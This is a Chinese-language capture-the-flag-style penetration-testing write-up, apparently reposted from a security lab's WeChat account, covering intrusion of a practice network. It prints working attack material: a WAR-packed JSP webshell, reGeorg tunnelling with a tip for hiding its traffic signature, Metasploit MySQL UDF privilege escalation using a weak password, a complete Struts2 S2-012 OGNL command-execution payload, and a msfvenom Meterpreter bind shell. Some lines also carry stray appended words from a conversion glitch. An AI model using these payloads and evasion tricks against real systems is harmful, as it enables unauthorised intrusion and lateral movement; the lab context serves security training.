前兩天朋友分享了一個實驗靶場,感受環境還不錯,因而對測試過程進行了詳細記錄,靶場中涉及知識點總結以下:
css
War包製做java
regeorg內網代理工具的使用mysql
UDF漏洞利用linux
Struts2-012漏洞利用nginx
Msfvenom模塊的使用git
本次實驗靶場的網絡拓撲結構以下圖所示:github
01web
獲取web據點sql
首先訪問朋友給定的web服務器端口,爲tomcat應用的默認頁面,以下圖所示:shell
jar cvf shell.war xx.jsp
菜刀成功鏈接後,會以樹狀形式顯示webshell文件所處位置,以下圖所示
02
添加代理
有內網:以此爲跳板,攻擊內網其餘機器,摸清目標內網拓撲環境,拿下靶標系統;
無內網:若是是項目,就能夠收工了,不是的話,就能夠做爲代理池的一部分;
目標web服務器並沒有探測主機存活的工具,兩種方式:
本身上傳端口掃描工具||腳本
使用隧道代理工具,代理本身的工具進入目標內網中,作初步的信息蒐集。
此處選擇第二種方式,上傳regeorg程序的tunnel.jsp腳本到目標服務器的shell目錄下
web訪問返回鏈接成功的信息(Georg says,’All seems fine’) 以下圖所示,此爲該工具流量硬特徵,建議在下載後修改該字符串,或者使用升級版的neo-regeorg
https://github.com/L-codes/Neo-reGeorg 去特徵且傳輸加密
Python regeorgsocksproxy.py -u hxxp://x.x.x.x/tunnel.jsp -p xxxx
-u 代理木馬連接;
-p指定傳輸端口;
03
UDF漏洞利用
經過掃描獲得的MySQL應用信息,嘗試弱口令鏈接,同樣的思路哪一個應用不會搜索哪裏
查看security_file_priv是否配置命令:
show variables like '%secure%';
顯示結果對應解釋
Secure_file_priv=null //不容許導入導出文件Secure_file_priv='D:/' //容許導入到指定目錄Secure_file_priv=‘’ //容許到任意目錄Secure_file_priv=」/」 //容許到根目錄
Use exploit/multi/mysql/mysql_udf_payload
Set rhost 172.16.15.16Set password 123456 run
雖然顯示沒有會話,可是so文件已經傳上去了,使用默認的MySQL命令鏈接,執行自定義函數,成功執行,說明udf提權成功。
04
S2-012漏洞利用
代理nmap到內網掃描10網段機器敏感端口
發現10.10.60.250:8080存在struts2-012漏洞
Struts2-012 payload 測試
%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","-al"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }
成功讀取/etc/passwd文件
10.10.60.66和172.16.15.16同樣的思路。
弱口令:admin/password
上傳菜刀的jsp木馬
使用蟻劍服務器管理工具鏈接成功
Msf生成Linux木馬
msfvenom -p linux/x86/meterpreter/bind_tcp rhost=10.10.60.66 lport=1234 -f elf > shell.elf
set payload linux/x86/meterpreter/bing_tcpSet rhost 10.10.60.66Set lport 1234
exploit -j 後臺獲取會話Sessions 可查看會話 -i 進入該會話
- 往期推薦 -
【推薦書籍】
本文分享自微信公衆號 - 貝塔安全實驗室(BetaSecLab)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。